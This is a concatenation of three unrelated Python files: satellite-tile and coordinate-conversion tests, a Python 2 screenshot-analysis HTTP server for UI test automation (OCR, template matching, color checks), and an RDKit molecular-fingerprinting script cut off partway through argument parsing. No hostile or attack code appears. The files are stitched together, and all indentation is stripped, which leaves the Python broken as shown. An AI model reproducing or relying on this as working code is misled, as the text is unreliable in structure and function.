assert tile['thumbnail'] == 'http://sentinel-s2-l1c.s3.amazonaws.com/tiles/56/X/NF/2016/3/16/0/preview.jp2'
assert tile['tile_name'] == 'S2A_OPER_MSI_L1C_TL_SGS__20160316T054120_A003818_T56XNF_N02.01'
assert tile['utm_zone'] == 56
assert tile['data_coverage_percentage'] == 65.58
assert tile['sensing_orbit_direction'] == 'DESCENDING'
assert len(tile['download_links']['aws_s3']) == 13
# Make sure bands urls are left padded
d_link = tile['download_links']['aws_s3'][0].split('.')[-2].split('/')
assert d_link[-1] == 'B01'
def test_to_latlon_edge_of_coordinate_system(self):
geojson = {
"type": "Polygon",
"crs": {
"type": "name",
"properties": {
"name": "urn:ogc:def:crs:EPSG:8.8.1:32601"
}
},
"coordinates": [
[
[
336706.875271381,
7799999.0
],
[
409799.0,
7799999.0
],
[
409799.0,
7690201.0
],
[
300001.0,
7690201.0
],
[
300001.0,
7728957.392986406
],
[
315164.079827873,
7758207.990416902
],
[
330501.865974295,
7787926.032465892
],
[
336706.875271381,
7799999.0
]
]
]
}
gj = to_latlon(copy(geojson))
self.assertNotEqual(gj['coordinates'][0][0], geojson['coordinates'][0][0])
self.assertAlmostEqual(gj['coordinates'][0][1][0], 180.60306, 4)
def test_to_latlon(self):
geojson = {
'type': 'Polygon',
'coordinates': [
[
[448938.374906865, 2500019.0],
[509759.0, 2500019.0],
[509759.0, 2390221.0],
[424439.204990156, 2390221.0],
[430306.260834363, 2416547.808440298],
[444965.351229892, 2482150.64898733],
[448938.374906865, 2500019.0]
]
],
'crs': {'type': 'name', 'properties': {'name': 'urn:ogc:def:crs:EPSG:8.8.1:32632'}}
}
gj = to_latlon(copy(geojson))
assert gj['coordinates'][0][0] != geojson['coordinates'][0][0]
def test_get_tile_geometry(self):
tiles = {
'partial_right': {
'path': 'tests/samples/B01_right.jp2',
'tile': [-75.3723, -74.8924],
'data': [-75.0555, -75.3723],
'epsg': 32618
},
'partial_left': {
'path': 'tests/samples/B01_left.jp2',
'tile': [-62.1004, -61.113],
'data': [-62.1002, -62.0978],
'epsg': 32620
},
'full': {
'path': 'tests/samples/B01_full.jp2',
'tile': [-67.4893, -67.4893],
'data': [-67.4893, -67.4893],
'epsg': 32620
},
'edge_case': {
'path': 'tests/samples/B01_multi.jp2',
'tile': [-69.0002, -68.8339],
'data': [-68.9683, -68.8339],
'epsg': 32619
},
}
for t in iterkeys(tiles):
print(t)
(tile, data) = get_tile_geometry(tiles[t]['path'], tiles[t]['epsg'])
fc = {
'type': 'FeatureCollection',
'features': []
}
for g in [data]:
f = {
'type': 'Feature',
'properties': {},
'geometry': g
}
fc['features'].append(f)
# # uncommen to write the results to disk for testing
# f = open('test_%s.geojson' % t, 'w')
# f.write(json.dumps(fc))
for i in range(0, 2):
self.assertEqual(tiles[t]['tile'][i], round(tile['coordinates'][0][i][0], 4))
self.assertEqual(tiles[t]['data'][i], round(data['coordinates'][0][i][0], 4))
|
|
#!/usr/bin/python
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import numpy as np
from urlparse import parse_qs
from PIL import Image
from io import BytesIO
import base64
from CharInfo import CharInfo
from LocInfo import LocInfo
from Point import Point
import sys
import math
from PIL import ImageFilter
import cv2
import imutils
try:
from ImageService import image_to_string
except ImportError:
from pytesseract.pytesseract import image_to_string
sys.setrecursionlimit(100000)
PORT_NUMBER = 6666
# USER = "hoangpx"
USER = "Automation"
# This class will handles any incoming request from
# the browser
class myHandler(BaseHTTPRequestHandler):
def find_image_zoom(self, imageBefore, imageAfter, threadhold):
# convert both images to gray
openCVImageBefore = Image.open(BytesIO(base64.b64decode(imageBefore)))
image_before = cv2.cvtColor(np.array(openCVImageBefore), cv2.COLOR_RGB2BGR)
gray_image = cv2.cvtColor(image_before, cv2.COLOR_BGR2GRAY)
openCVImageAfter = Image.open(BytesIO(base64.b64decode(imageAfter)))
template = cv2.cvtColor(np.array(openCVImageAfter), cv2.COLOR_RGB2BGR)
template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
list_result = []
# cv2.imwrite('/Users/'+USER+'/Desktop/image_before.png', image_before)
# cv2.imwrite('/Users/'+USER+'/Desktop/template.png', template)
for scale in np.linspace(1.0, 0.1, 100)[::-1]:
resized_image = imutils.resize(template, width=int(template.shape[1] * scale))
zoom_scale = template.shape[1] / float(resized_image.shape[1])
result = cv2.matchTemplate(gray_image, resized_image, cv2.TM_CCOEFF_NORMED)
w, h = resized_image.shape[::-1]
loc = np.where(result >= float(threadhold))
for pt in zip(*loc[::-1]):
isValid = True
for point in list_result:
if (abs(point[0] - pt[0]) < w) and (abs(point[1] - pt[1]) < h):
isValid = False
break
if isValid is True:
list_result.insert(0, pt)
cv2.rectangle(image_before, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 2)
# cv2.imwrite('/Users/'+USER+'/Desktop/scaled.png', image_before)
return zoom_scale
return 0
def isolateColor(self, source_image):
hsv = cv2.cvtColor(source_image, cv2.COLOR_RGB2BGR)
lower_green = np.array([0, 128, 0])
upper_green = np.array([128, 256, 128])
mask = cv2.inRange(hsv, lower_green, upper_green)
res = cv2.bitwise_and(source_image, source_image, mask=mask)
# cv2.imwrite('/Users/'+USER+'/Desktop/res.png', res)
def matching_image(self, source_image, gray_image, template_image, threshold):
img2 = gray_image.copy()
w, h = template_image.shape[::-1]
res = cv2.matchTemplate(img2, template_image, cv2.TM_CCOEFF_NORMED)
loc = np.where(res >= float(threshold))
count = 0
list_result = []
locations = []
for pt in zip(*loc[::-1]):
isValid = True
for point in list_result:
if (abs(point[0] - pt[0]) < w) and (abs(point[1] - pt[1]) < h):
isValid = False
break
if isValid is True:
list_result.insert(0, pt)
cv2.rectangle(source_image, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 2)
count += 1
print (pt[0] + w / 2, pt[1] + h / 2)
locations.append((pt[0] + w / 2, pt[1] + h / 2))
cv2.imwrite("/Users/"+USER+"/Desktop/result.png", source_image)
return locations
def remove_image(self, source_image, template_image):
gray_image = cv2.cvtColor(source_image, cv2.COLOR_BGR2GRAY)
img2 = gray_image.copy()
w, h = template_image.shape[::-1]
res = cv2.matchTemplate(img2, template_image, cv2.TM_CCOEFF_NORMED)
loc = np.where(res >= float(0.7))
count = 0
list_result = []
locations = []
for pt in zip(*loc[::-1]):
isValid = True
for point in list_result:
if (abs(point[0] - pt[0]) < w) and (abs(point[1] - pt[1]) < h):
isValid = False
break
if isValid is True:
list_result.insert(0, pt)
cv2.rectangle(source_image, pt, (pt[0] + w, pt[1] + h), (0, 0, 0), -20)
count += 1
print (pt[0] + w / 2, pt[1] + h / 2)
locations.append((pt[0] + w / 2, pt[1] + h / 2))
return source_image
def get_filepaths(self, directory):
file_paths = [] # List which will store all of the full filepaths.
# Walk the tree.
for root, directories, files in os.walk(directory):
for filename in files:
# Join the two strings in order to form the full filepath.
filepath = os.path.join(root, filename)
file_paths.append(filepath) # Add it to the list.
return file_paths
def getTextLocation(self, text, source_image, rectangle, screenSize, attachedResults):
locations = []
# get screenshot size
size = screenSize.split("/")
# get rectangle info of cropped image in percent
rect = rectangle.split(",")
# get actual width, height of cropped image
w, h = source_image.size
attachedResults["textSize"] = 0
# convert PIL image into OpenCV Image
open_cv_image = np.array(source_image)
airport_image = cv2.imread("ios/airportIcon.png", cv2.IMREAD_GRAYSCALE)
open_cv_image = self.remove_image(open_cv_image, airport_image)
# cv2.imwrite('/Users/hoangpx/Desktop/result.png', open_cv_image)
# Convert RGB to BGR
open_cv_image = open_cv_image[:, :, ::-1].copy()
charInfos = []
# This will increase accuracy of OCR
# there'are 3 kind of text color we want to verify
boundaries = [
([0, 78, 0], [40, 255, 40]), # purple
([189, 189, 189], [255, 255, 255]), # black
([0, 150, 150], [60, 255, 255]) # blue
]
# we will filter the image for each color
readText = ""
i = 0
inverted_image = 255 - open_cv_image
for (lower, upper) in boundaries:
# charInfos = []
# readText = ""
lower = np.array(lower, dtype="uint8")
upper = np.array(upper, dtype="uint8")
# invert color for easer to read text
mask = cv2.inRange(inverted_image, lower, upper)
output = cv2.bitwise_and(inverted_image, inverted_image, mask=mask)
gray_image = cv2.cvtColor(output, cv2.COLOR_BGR2GRAY)
(thresh, im_bw) = cv2.threshold(gray_image, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)
path = "/Users/"+USER+"/Desktop/" + str(i) + ".png"
# cv2.imwrite(path, output)
i = i + 1
#convert back from opencv image into PIL image
cv2_im = cv2.cvtColor(im_bw, cv2.COLOR_GRAY2RGB)
pil_im = Image.fromarray(cv2_im)
pil_im.save(path)
readText += self.process_image(pil_im, charInfos)
# print readText
if text != "" and text is not None:
try:
beginMatchIndex = readText.index(text)
endMatchIndex = beginMatchIndex + (len(text) - 1)
p1 = charInfos[beginMatchIndex]
p2 = charInfos[endMatchIndex]
# calculate text position in cropped image (follow as axis of cropped image)
locX = ((p2.x2 - p1.x1) / 2) + p1.x1;
locY = ((p2.y2 - p1.y1) / 2) + (h - p2.y2);
# calculate position in full screenshot
offsetX = (int(size[0]) * float(rect[0])) / 100
offsetY = (int(size[1]) * float(rect[1])) / 100
x = offsetX + locX
y = offsetY + locY
# get size of text
textSize = int(math.sqrt(math.pow(p2.y2 - p1.y1, 2) + math.pow(p2.x2 - p1.x1, 2)))
attachedResults["textSize"] = textSize;
# and convert it to percent
originalX = float(x) / int(size[0])
originalY = float(y) / int(size[1])
locations.append((originalX, originalY))
except ValueError:
# print "Text not found"
print ""
else:
print ""
# print "Get All Text"
attachedResults["readText"] = readText
return locations
def getLocationRectangle(self, object, rectangle, screenSize):
print(screenSize, rectangle, object)
locations = []
size = screenSize.split("/")
rect = rectangle.split(",")
if object != "":
for it in object:
tmp = str(it).replace("(", "").replace(")", "")
loc = tmp.split(",")
offsetX = (float(size[0]) * float(rect[0])) / 100
offsetY = (float(size[1]) * float(rect[1])) / 100
x = offsetX + float(loc[0])
y = offsetY + float(loc[1])
originalX = float(x) / float(size[0])
originalY = float(y) / float(size[1])
locations.append((originalX, originalY))
return locations
else:
print "Location is nil"
return ""
def process_image(self, image, charInfos):
# image.filter(ImageFilter.SHARPEN)
# read all characters on image
rawText = image_to_string(image, boxes=True)
# print("OUTPUT :", rawText)
# split into char by char
chars = rawText.split('\n')
# summarize all character into text
readText = ''
if rawText:
for char in chars:
parts = char.split(' ')
try:
parts[0].decode('ascii')
# parts contains: character, bottomLeft pos, topRight pos, 0
charInfo = CharInfo(parts[0], int(parts[1]), int(parts[2]), int(parts[3]), int(parts[4]))
charInfos.append(charInfo)
readText += parts[0][0]
except UnicodeDecodeError:
print ""
# print "This isn't error: Don't accept this char \"" + parts[0] + "\" which isn't ASCII character"
return readText
def atan2(self, paramVectorY, paramVectorX):
ret = None
try:
tangent = paramVectorY / paramVectorX
except ZeroDivisionError:
return ret
if paramVectorX > 0:
ret = math.atan(tangent)
elif paramVectorX == 0:
if paramVectorY < 0:
ret = -3.14 / 2
elif paramVectorY > 0:
ret = 3.14 / 2
else:
if paramVectorY < 0:
ret = math.atan(tangent) - 3.14
else:
ret = math.atan(tangent) + 3.14
return ret
def getPointBetweenTwoPoints(self, paramPoint1, paramPoint2, paramPercent):
offsetX = float(paramPoint2.x) - float(paramPoint1.x)
offsetY = float(paramPoint2.y) - float(paramPoint1.y)
routeLength = math.sqrt((offsetX * offsetX) + (offsetY * offsetY))
routeAngle = self.atan2(offsetY, offsetX)
coordX = paramPoint1.x + (((float(paramPercent) / 100) * routeLength) * math.cos(routeAngle))
coordY = paramPoint1.y + (((float(paramPercent) / 100) * routeLength) * math.sin(routeAngle))
return Point(coordX, coordY)
def getParam(self, paramName, fields):
if paramName in fields:
return fields[paramName][0]
return None
def valueForKey(self, dict, key):
try:
value = dict[key]
return value
except KeyError:
return "0"
def findGreen(self, arr, y, x, w, h, locInfo):
# check 8 sides around this coordinate
sides = [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 0], [0, 1], [1, -1], [1, 0], [1, 1], [-2, -2], [-2, -1],
[-2, 0], [-2, 1], [-2, 2], [-1, -2], [-1, -1], [-1, 0], [-1, 1], [-1, 2], [0, -2], [0, -1], [0, 0],
[0, 1], [0, 2], [1, -2], [1, -1], [1, 0], [1, 1], [1, 2], [2, -2], [2, -1], [2, 0], [2, 1], [2, 2]]
for side in sides:
testX = x + side[0]
testY = y + side[1]
if testX < w and testY < h and testX >= 0 and testY >= 0:
color = arr[testY, testX]
if color[0] <= 127 and color[1] >= 128 and color[2] <= 127:
arr[testY, testX] = [-1, -1, -1]
locInfo.locs.append([testX, testY])
# building left-bottom and top-right of bounding box which cover the highlight
if locInfo.x1 == None or locInfo.x1 > testX:
locInfo.x1 = testX
if locInfo.y1 == None or locInfo.y1 < testY:
locInfo.y1 = testY
if locInfo.x2 == None or locInfo.x2 < testX:
locInfo.x2 = testX
if locInfo.y2 == None or locInfo.y2 > testY:
locInfo.y2 = testY
self.findGreen(arr, testY, testX, w, h, locInfo)
def do_POST(self):
result = -1
try:
sample_img_uri = None
text = None
print "POST"
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
fields = parse_qs(post_body)
if len(fields) > 0:
# get search type
searchType = self.getParam("searchType", fields)
# check if request from IOS or Window
if self.getParam("isIOS", fields) is None:
isIOS = False
else:
isIOS = True
if searchType == "image" or searchType == "imageLocation":
# check if request is getting location of image or not
isGettingLocation = searchType == "imageLocation"
# get parameters
sampleImageName = self.getParam("sampleImageName", fields)
if sampleImageName is not None:
if isIOS:
sample_img_uri = "ios/" + sampleImageName
else:
sample_img_uri = "windows/" + sampleImageName
isExist = os.path.isfile(sample_img_uri)
print (isExist)
image = self.getParam("image", fields)
threshold = self.getParam("threshold", fields)
screenSize = self.getParam("screenSize", fields)
rectangle = self.getParam("rectangle", fields)
occurrences = self.getParam("occurrences", fields)
source_image = Image.open(BytesIO(base64.b64decode(image)))
openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
gray_image = cv2.cvtColor(openCVImage, cv2.COLOR_BGR2GRAY)
sample_image = cv2.imread(sample_img_uri, cv2.IMREAD_GRAYSCALE)
numberOfRes = []
# try to search multiple scale simulator
scaleValues = [0.33, 0.5, 0.75, 1]
while len(numberOfRes) == 0:
if len(scaleValues) > 0:
scaleRate = scaleValues.pop()
resizedImage = cv2.resize(sample_image, None, fx=float(scaleRate), fy=float(scaleRate),
interpolation=cv2.INTER_CUBIC)
numberOfRes = self.matching_image(openCVImage, gray_image, resizedImage, threshold)
else:
break
if isGettingLocation is True:
print ("Getting Image Locations")
if rectangle is None:
rectangle = "0,0,100,100"
print ("numberOfResult: ", len(numberOfRes), " | expected result ")
result = self.getLocationRectangle(numberOfRes, rectangle, screenSize)
else:
print ("Searching for image " + sample_img_uri)
print ("numberOfResult: ", len(numberOfRes), " | expected result ", occurrences)
if len(numberOfRes) == int(occurrences):
result = 1
else:
result = 0
elif searchType == "text" or searchType == "textLocation" or searchType == "textSize" or searchType == "getAllText":
text = self.getParam("text", fields)
screenSize = self.getParam("screenSize", fields)
image = self.getParam("image", fields)
rectangle = self.getParam("rectangle", fields)
source_image = Image.open(BytesIO(base64.b64decode(image)))
attachedResults = {}
result = self.getTextLocation(text, source_image, rectangle, screenSize, attachedResults)
print "Text read is :", attachedResults["readText"]
if searchType == "textLocation":
print ("Getting Text Locations")
elif searchType == "textSize":
print ("Getting Text Size")
result = attachedResults["textSize"]
elif searchType == "getAllText":
print ("Getting All Text")
result = attachedResults["readText"]
else:
print ("Searching for text " + text)
if len(result) > 0:
result = 1
else:
result = 0
elif searchType == "routeLine":
routeLine = self.getParam("routeLine", fields)
image = self.getParam("image", fields)
source_image = Image.open(BytesIO(base64.b64decode(image)))
openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
w, h = source_image.size
routes = routeLine.split(",")
x1 = float(routes[0])
y1 = float(routes[1])
x2 = float(routes[2])
y2 = float(routes[3])
point1 = Point(x1 * w, y1 * h)
point2 = Point(x2 * w, y2 * h)
checkValues = [3, 5, 8, 13, 15, 17, 21, 25, 28, 34, 36, 39, 42, 46, 49, 51, 55, 59, 62, 65, 69, 82,
85, 89, 91, 97, 99]
validCount = 0
for check in checkValues:
colorPoint = self.getPointBetweenTwoPoints(point1, point2, check)
row = int(colorPoint.y) - 1
column = int(colorPoint.x) - 1
if row <= 0:
row = 0
if column <= 0:
column = 0
color = openCVImage[row, column];
if color[0] >= 128 and color[1] <= 127 and color[2] <= 127:
validCount += 1
matchRate = float(validCount) / len(checkValues)
if matchRate > 0.8:
result = 1
else:
result = 0
elif searchType == "highlightLocation":
image = self.getParam("image", fields)
source_image = Image.open(BytesIO(base64.b64decode(image)))
openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
lower = np.array([0, 128, 0])
upper = np.array([127, 256, 127])
shapeMask = cv2.inRange(openCVImage, lower, upper)
# find the contours in the mask
_, cnts, _ = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
print "I found %d highlight shapes" % (len(cnts))
print "Getting Highlight Position"
cv2.imwrite("/Users/" + USER + "/Desktop/before_highlight.png", openCVImage)
cv2.imwrite("/Users/" + USER + "/Desktop/after_highlight.png", shapeMask)
result = len(cnts)
elif searchType == "verifyZoom":
imageBeforeZoom = self.getParam("imageBeforeZoom", fields)
imageAfterZoom = self.getParam("image", fields)
threshold = self.getParam("threshold", fields)
zoomLevel = self.find_image_zoom(imageBeforeZoom, imageAfterZoom, threshold)
result = zoomLevel
print ("zoom scale " + str(result))
elif searchType == "colorAtLocation":
image = self.getParam("image", fields)
screenSize = self.getParam("screenSize", fields)
rect = self.getParam("colorAt", fields)
source_image = Image.open(BytesIO(base64.b64decode(image)))
openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
#source_image = Image.open("/Users/DuyLD/Desktop/Screen Shot 2016-07-12 at 3.52.04 PM.png")
self.isolateColor(openCVImage)
w, h = source_image.size
# clone color matrix to detect green highlight
new_list = openCVImage[:]
# hold current group identifier, just increment by one for next group
rectangle = rect.split(",")
# convert to percent
offsetX = (int(w) * int(rectangle[0])) / 100
offsetY = (int(h) * int(rectangle[1])) / 100
result = new_list[offsetY, offsetX]
print (new_list[offsetY, offsetX] )
else:
print "error"
result = -1
print "Response : ", result
except AssertionError:
print "St went wrong"
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(result)
return
try:
# Create a web server and define the handler to manage the
# incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ', PORT_NUMBER
# Wait forever for incoming htto requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
|
|
#
# Copyright (c) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" utility functionality for fingerprinting sets of molecules
includes a command line app for working with fingerprints
and databases
Sample Usage:
python FingerprintMols.py -d data.gdb \
-t 'raw_dop_data' --smilesName="Structure" --idName="Mol_ID" \
--outTable="daylight_sig"
"""
import getopt
import sys
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem import MACCSkeys
from rdkit.ML.Cluster import Murtagh
import pickle
def error(msg):
sys.stderr.write(msg)
def message(msg):
sys.stderr.write(msg)
def GetRDKFingerprint(mol):
""" uses default parameters """
details = FingerprinterDetails()
return FingerprintMol(mol, **details.__dict__)
def FoldFingerprintToTargetDensity(fp, **fpArgs):
nOn = fp.GetNumOnBits()
nTot = fp.GetNumBits()
while (float(nOn) / nTot < fpArgs['tgtDensity']):
if nTot / 2 > fpArgs['minSize']:
fp = DataStructs.FoldFingerprint(fp, 2)
nOn = fp.GetNumOnBits()
nTot = fp.GetNumBits()
else:
break
return fp
def FingerprintMol(mol, fingerprinter=Chem.RDKFingerprint, **fpArgs):
if not fpArgs:
details = FingerprinterDetails()
fpArgs = details.__dict__
if fingerprinter != Chem.RDKFingerprint:
fp = fingerprinter(mol, **fpArgs)
fp = FoldFingerprintToTargetDensity(fp, **fpArgs)
else:
fp = fingerprinter(mol, fpArgs['minPath'], fpArgs['maxPath'], fpArgs['fpSize'],
fpArgs['bitsPerHash'], fpArgs['useHs'], fpArgs['tgtDensity'],
fpArgs['minSize'])
return fp
def FingerprintsFromSmiles(dataSource, idCol, smiCol, fingerprinter=Chem.RDKFingerprint,
reportFreq=10, maxMols=-1, **fpArgs):
""" fpArgs are passed as keyword arguments to the fingerprinter
Returns a list of 2-tuples: (ID,fp)
"""
res = []
nDone = 0
for entry in dataSource:
ID, smi = str(entry[idCol]), str(entry[smiCol])
mol = Chem.MolFromSmiles(smi)
if mol is not None:
fp = FingerprintMol(mol, fingerprinter, **fpArgs)
res.append((ID, fp))
nDone += 1
if reportFreq > 0 and not nDone % reportFreq:
message('Done %d molecules\n' % (nDone))
if maxMols > 0 and nDone >= maxMols:
break
else:
error('Problems parsing SMILES: %s\n' % smi)
return res
def FingerprintsFromMols(mols, fingerprinter=Chem.RDKFingerprint, reportFreq=10, maxMols=-1,
**fpArgs):
""" fpArgs are passed as keyword arguments to the fingerprinter
Returns a list of 2-tuples: (ID,fp)
"""
res = []
nDone = 0
for ID, mol in mols:
if mol:
fp = FingerprintMol(mol, fingerprinter, **fpArgs)
res.append((ID, fp))
nDone += 1
if reportFreq > 0 and not nDone % reportFreq:
message('Done %d molecules\n' % (nDone))
if maxMols > 0 and nDone >= maxMols:
break
else:
error('Problems parsing SMILES: %s\n' % smi)
return res
def FingerprintsFromPickles(dataSource, idCol, pklCol, fingerprinter=Chem.RDKFingerprint,
reportFreq=10, maxMols=-1, **fpArgs):
""" fpArgs are passed as keyword arguments to the fingerprinter
Returns a list of 2-tuples: (ID,fp)
"""
res = []
nDone = 0
for entry in dataSource:
ID, pkl = str(entry[idCol]), str(entry[pklCol])
mol = Chem.Mol(pkl)
if mol is not None:
fp = FingerprintMol(mol, fingerprinter, **fpArgs)
res.append((ID, fp))
nDone += 1
if reportFreq > 0 and not nDone % reportFreq:
message('Done %d molecules\n' % (nDone))
if maxMols > 0 and nDone >= maxMols:
break
else:
error('Problems parsing pickle for ID: %s\n' % ID)
return res
def FingerprintsFromDetails(details, reportFreq=10):
data = None
if details.dbName and details.tableName:
from rdkit.Dbase.DbConnection import DbConnect
from rdkit.Dbase import DbInfo
from rdkit.ML.Data import DataUtils
try:
conn = DbConnect(details.dbName, details.tableName)
except Exception:
import traceback
error('Problems establishing connection to database: %s|%s\n' % (details.dbName,
details.tableName))
traceback.print_exc()
if not details.idName:
details.idName = DbInfo.GetColumnNames(details.dbName, details.tableName)[0]
dataSet = DataUtils.DBToData(details.dbName, details.tableName,
what='%s,%s' % (details.idName, details.smilesName))
idCol = 0
smiCol = 1
elif details.inFileName and details.useSmiles:
from rdkit.ML.Data import DataUtils
conn = None
if not details.idName:
details.idName = 'ID'
try:
dataSet = DataUtils.TextFileToData(details.inFileName,
onlyCols=[details.idName, details.smilesName])
except IOError:
import traceback
error('Problems reading from file %s\n' % (details.inFileName))
traceback.print_exc()
idCol = 0
smiCol = 1
elif details.inFileName and details.useSD:
conn = None
dataset = None
if not details.idName:
details.idName = 'ID'
dataSet = []
try:
s = Chem.SDMolSupplier(details.inFileName)
except Exception:
import traceback
error('Problems reading from file %s\n' % (details.inFileName))
traceback.print_exc()
else:
while 1:
try:
m = s.next()
except StopIteration:
break
if m:
dataSet.append(m)
if reportFreq > 0 and not len(dataSet) % reportFreq:
message('Read %d molecules\n' % (len(dataSet)))
if details.maxMols > 0 and len(dataSet) >= details.maxMols:
break
for i, mol in enumerate(dataSet):
if mol.HasProp(details.idName):
nm = mol.GetProp(details.idName)
else:
nm = mol.GetProp('_Name')
dataSet[i] = (nm, mol)
else:
dataSet = None
fps = None
if dataSet and not details.useSD:
data = dataSet.GetNamedData()
if not details.molPklName:
fps = FingerprintsFromSmiles(data, idCol, smiCol, **details.__dict__)
else:
fps = FingerprintsFromPickles(data, idCol, smiCol, **details.__dict__)
elif dataSet and details.useSD:
fps = FingerprintsFromMols(dataSet, **details.__dict__)
if fps:
if details.outFileName:
outF = open(details.outFileName, 'wb+')
for i in range(len(fps)):
pickle.dump(fps[i], outF)
outF.close()
dbName = details.outDbName or details.dbName
if details.outTableName and dbName:
from rdkit.Dbase.DbConnection import DbConnect
from rdkit.Dbase import DbUtils, DbModule
conn = DbConnect(dbName)
#
# We don't have a db open already, so we'll need to figure out
# the types of our columns...
#
colTypes = DbUtils.TypeFinder(data, len(data), len(data[0]))
typeStrs = DbUtils.GetTypeStrings([details.idName, details.smilesName], colTypes,
keyCol=details.idName)
cols = '%s, %s %s' % (typeStrs[0], details.fpColName, DbModule.binaryTypeName)
# FIX: we should really check to see if the table
# is already there and, if so, add the appropriate
# column.
#
# create the new table
#
if details.replaceTable or \
details.outTableName.upper() not in [x.upper() for x in conn.GetTableNames()]:
conn.AddTable(details.outTableName, cols)
#
# And add the data
#
for ID, fp in fps:
tpl = ID, DbModule.binaryHolder(fp.ToBinary())
conn.InsertData(details.outTableName, tpl)
conn.Commit()
return fps
# ------------------------------------------------
#
# Command line parsing stuff
#
# ------------------------------------------------
class FingerprinterDetails(object):
""" class for storing the details of a fingerprinting run,
generates sensible defaults on construction
"""
def __init__(self):
self._fingerprinterInit()
self._screenerInit()
self._clusterInit()
def _fingerprinterInit(self):
self.fingerprinter = Chem.RDKFingerprint
self.fpColName = "AutoFragmentFP"
self.idName = ''
self.dbName = ''
self.outDbName = ''
self.tableName = ''
self.minSize = 64
self.fpSize = 2048
self.tgtDensity = 0.3
self.minPath = 1
self.maxPath = 7
self.discrimHash = 0
self.useHs = 0
self.useValence = 0
self.bitsPerHash = 2
self.smilesName = 'SMILES'
self.maxMols = -1
self.outFileName = ''
self.outTableName = ''
self.inFileName = ''
self.replaceTable = True
self.molPklName = ''
self.useSmiles = True
self.useSD = False
def _screenerInit(self):
self.metric = DataStructs.TanimotoSimilarity
self.doScreen = ''
self.topN = 10
self.screenThresh = 0.75
self.doThreshold = 0
self.smilesTableName = ''
self.probeSmiles = ''
self.probeMol = None
self.noPickle = 0
def _clusterInit(self):
self.clusterAlgo = Murtagh.WARDS
self.actTableName = ''
self.actName = ''
def GetMetricName(self):
if self.metric == DataStructs.TanimotoSimilarity:
return 'Tanimoto'
elif self.metric == DataStructs.DiceSimilarity:
return 'Dice'
elif self.metric == DataStructs.CosineSimilarity:
return 'Cosine'
elif self.metric:
return self.metric
else:
return 'Unknown'
def SetMetricFromName(self, name):
name = name.upper()
if name == "TANIMOTO":
self.metric = DataStructs.TanimotoSimilarity
elif name == "DICE":
self.metric = DataStructs.DiceSimilarity
elif name == "COSINE":
self.metric = DataStructs.CosineSimilarity
def Usage():
""" prints a usage string and exits
"""
print(_usageDoc)
sys.exit(-1)
_usageDoc = """
Usage: FingerprintMols.py [args] <fName>
If <fName> is provided and no tableName is specified (see below),
data will be read from the text file <fName>. Text files delimited
with either commas (extension .csv) or tabs (extension .txt) are
supported.
Command line arguments are:
- -d _dbName_: set the name of the database from which
to pull input molecule information. If output is
going to a database, this will also be used for that
unless the --outDbName option is used.
- -t _tableName_: set the name of the database table
from which to pull input molecule information
- --smilesName=val: sets the name of the SMILES column
in the input database. Default is *SMILES*.
- --useSD: Assume that the input file is an SD file, not a SMILES
table.
- --idName=val: sets the name of the id column in the input
database. Defaults to be the name of the first db column
(or *ID* for text files).
- -o _outFileName_: name of the output file (output will
be a pickle file with one label,fingerprint entry for each
molecule).
- --outTable=val: name of the output db table used to store
fingerprints. If this table already exists, it will be
replaced.
- --outDbName: name of output database, if it's being used.
Defaults to be the same as the input db.
- --fpColName=val: name to use for the column which stores
fingerprints (in pickled format) in the output db table.
Default is *AutoFragmentFP*
- --maxSize=val: base size of the fingerprints to be generated
Default is *2048*
- --minSize=val: minimum size of the fingerprints to be generated
(limits the amount of folding that happens). Default is *64*
- --density=val: target bit density in the fingerprint. The
fingerprint will be folded until this density is
reached. Default is *0.3*
- --minPath=val: minimum path length to be included in
fragment-based fingerprints. Default is *1*.
- --maxPath=val: maximum path length to be included in
fragment-based fingerprints. Default is *7*.
- --nBitsPerHash: number of bits to be set in the output
fingerprint for each fragment. Default is *2*.
- --discrim: use of path-based discriminators to hash bits.
Default is *false*.
- -V: include valence information in the fingerprints
Default is *false*.
- -H: include Hs in the fingerprint
Default is *false*.
- --maxMols=val: sets the maximum number of molecules to be
fingerprinted.
- --useMACCS: use the public MACCS keys to do the fingerprinting
(instead of a daylight-type fingerprint)
"""
def ParseArgs(details=None):
""" parses the command line arguments and returns a
_FingerprinterDetails_ instance with the results.
**Note**:
- If you make modifications here, please update the global
_usageDoc string so the Usage message is up to date.
- This routine is used by both the fingerprinter, the clusterer and the
screener; not all arguments make sense for all applications.
"""
args = sys.argv[1:]
try:
args, extras = getopt.getopt(args,
'HVs:d:t:o:h',
[
'minSize=',
'maxSize=',
'density=',
'minPath=',
'maxPath=',
'bitsPerHash=',
'smilesName=',
'molPkl=',
'useSD',
'idName=',
'discrim',
'outTable=',
'outDbName=',
'fpColName=',
'maxMols=',
'useMACCS',
'keepTable',
# SCREENING:
'smilesTable=',
'doScreen=',
'topN=',
'thresh=',
'smiles=',
'dice',
'cosine',
# CLUSTERING:
'actTable=',
'actName=',
'SLINK',
'CLINK',
'UPGMA',
])
except Exception:
import traceback
traceback.print_exc()
Usage()
if details is None:
details = FingerprinterDetails()
if len(extras):
details.inFileName = extras[0]
for arg, val in args:
if arg == '-H':
details.useHs = 1
elif arg == '-V':
details.useValence = 1
elif arg == '-d':
details.dbName = val
